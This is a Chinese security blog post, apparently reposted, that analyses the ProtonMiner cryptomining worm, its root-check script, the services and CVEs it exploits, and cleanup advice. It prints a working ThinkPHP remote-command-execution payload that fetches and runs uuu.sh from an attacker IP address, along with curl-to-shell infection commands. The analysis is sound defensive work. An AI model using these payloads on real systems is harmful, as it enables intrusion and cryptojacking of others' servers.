内容简介:区块链安全咨询公司曲速未来表示:近日,有机构监测到一种挖矿蠕虫,正在互联网上加速传播,本文为作者“曲速未来安全区”,原创文章,转载时请保留本声明及附带文章链接。 内容仅供读者参考,并非投资建议,本网站将保留所有法律权益。
2019-03-05 18:05 区块链 技术
2485 收藏
区块链安全咨询公司曲速未来表示:近日,有机构监测到一种挖矿蠕虫,正在互联网上加速传播,
背景
区块链安全咨询公司 曲速未来 表示:近日,有机构监测到一种挖矿蠕虫,正在互联网上加速传播,并根据它使用ProtonMail邮箱地址作为矿池用户名的行为,将其命名为ProtonMiner。
据分析,这种蠕虫与TrendMicro于2018年12月曾报导过的“利用ElasticSearch旧漏洞传播的蠕虫”非常相似,可能是同一团伙所为。但与先前报导不同的是,二月中旬,该挖矿蠕虫扩大了攻击面,从仅攻击ElasticSearch这一种服务,变为攻击包括Redis, Weblogic在内的多种服务,传播速度大大加快。
本文着重描写该挖矿僵尸网络的传播手法,并在文末列出了安全建议,以帮助用户避免遭受感染,或在已被感染的情况下进行清理。
感染路径
攻击者先控制被感染主机执行以下两条命令之一,从而下载并运行uuu.sh。
/bin/bash -c curl -fsSL |sh
/bin/bash -c curl -fsSL |sh
而uuu.sh脚本运行后,将继续下载挖矿程序和配置文件用于挖矿,以及下载蠕虫木马用于继续攻击未感染主机。
“谨慎”的入侵脚本
入侵脚本uuu.sh,首先会通过试着写入”/etc/devtools”目录,来判断当前账户是否拥有root权限;脚本的大部分功能,只有当前账号具有root权限时才会运行。
#!/bin/sh
echo 1 > /etc/devtools
if [ -f "$rtdir" ]
then
echo "i am root"
echo "goto 1" >> /etc/devtools
# download & attack
fi
该脚本具有典型挖矿事件中恶意脚本的特征:检查并杀死其他僵尸网络的进程、将自身写入系统crontab文件、修改iptables设置从而允许某些端口上的通信等。然而这一脚本的作者或许更加谨慎:
1. 在脚本最后,攻击者清空了命令历史记录
2. 在挖矿配置文件中,攻击者使用了多个ProtonMail邮箱地址作为连接到矿池的用户名。
ProtonMail是世界最大的安全邮件服务提供商,ProtonMiner也是因此而得名。这种使用邮箱地址,而非门罗币钱包地址作为矿池用户名的做法很好地“保护”了攻击者的隐私,也为安全工作者们判断该僵尸网络的规模和收益情况增加了难度。
传播分析
ProtonMiner的横向传播程序名为”systemctI”,是一个由 Go 语言编译的程序。它的main函数如下图所示:
该程序在运行时,会首先通过_tmp_exe_linx_ipc_Init_ip等方法对要扫描的ip和使用的弱密码进行初始化。过程中会请求并下载以下两个地址的文件。
(ip地址c段列表)
(弱密码列表)
之后程序会进入main_Scan函数,该函数包含大量的扫描和漏洞利用相关子函数。
下表列出了受到该挖矿僵尸网络影响的服务和漏洞:
服务 漏洞 Hadoop 未授权访问 Drupal CVE-2018-7600 Redis 未授权访问 Spring Data Commons CVE-2018-1273 SQL Server 弱密码 Elastic Search CVE-2014-3120CVE-2015-1427 Weblogic CVE-2017-10271 ThinkPHP 两种远程命令执行漏洞,包括 CVE-2018-20062
例如一个ThinkPHP 的payload:
POST /index.php?s=captcha HTTP/1.1 Host:
*.*.*.* User-Agent:
Go-http-client/1.1 Content-Length:132 Connection:
close Content-Type:
application/x-www-form-urlencoded Accept-Encoding:gzip _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=url -fsSL http://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh |sh
ProtonMiner僵尸网络扩大攻击面之后,传播速度有了显著的提升。从下图可以看出,进入2月份以来,攻击量快速上升,并在2月中旬达到高峰,阿里云观察到已有上千台主机受到感染:
安全建议
区块链安全咨询公司 曲速未来 表示:不要用root账户启动数据库、网站服务器等服务,因为root启动的服务一旦被成功入侵,攻击者将拥有被入侵主机的所有权限。此外,像Redis和Hadoop这些主要是内部使用的服务,不应暴露在公网上。挖矿僵尸网络更新速度非常快,它们部分导致了互联网上无处不在的威胁。
本文内容由 曲速未来 (WarpFuture.com) 安全咨询公司整理编译,转载请注明。 曲速未来提供包括主链安全、交易所安全、交易所钱包安全、DAPP开发安全、智能合约开发安全等相关区块链安全咨询服务。
本文为作者“曲速未来安全区”,原创文章,转载时请保留本声明及附带文章链接。 内容仅供读者参考,并非投资建议,本网站将保留所有法律权益。
以上所述就是小编给大家介绍的《曲速未来 透露:ProtonMiner挖矿蠕虫扩大攻击面加速传播》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:
- 曲速未来 透露:恶意软件之自我保护方法
- Edge 开发团队透露更多细节:兼容 Chrome 扩展
- 16625份AI论文透露:深度学习正在走向终点?
- Python 之父透露退位隐情,与核心开发团队产生隔阂
- 曲速未来 透露:区块链应用正面临攻击者威胁
- Firefox 安卓版进入维护模式,开发团队透露在憋大招
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Series 60 应用程序开发
巴克 / 人民邮电出版社 / 2005-7 / 75.0
Series 60智能手机开发平台正掀起新一轮的移动服务浪潮。超过60%的手机生产商获得了Series 60平台的授权。Series 60移动应用开发平台拥有最大的用户群,从而成为智能手机市场的代表。诺基亚与EMCC软件公司合作,为C++程序员和软件设计师编撰了这本Series 60开发的权威指南。本书由诺基亚资深专家进行了全面审阅。本书内容涉及了开发过程的各个阶段,从设计、编程、测试、调试到部署......一起来看看 《Series 60 应用程序开发》 这本书的介绍吧!
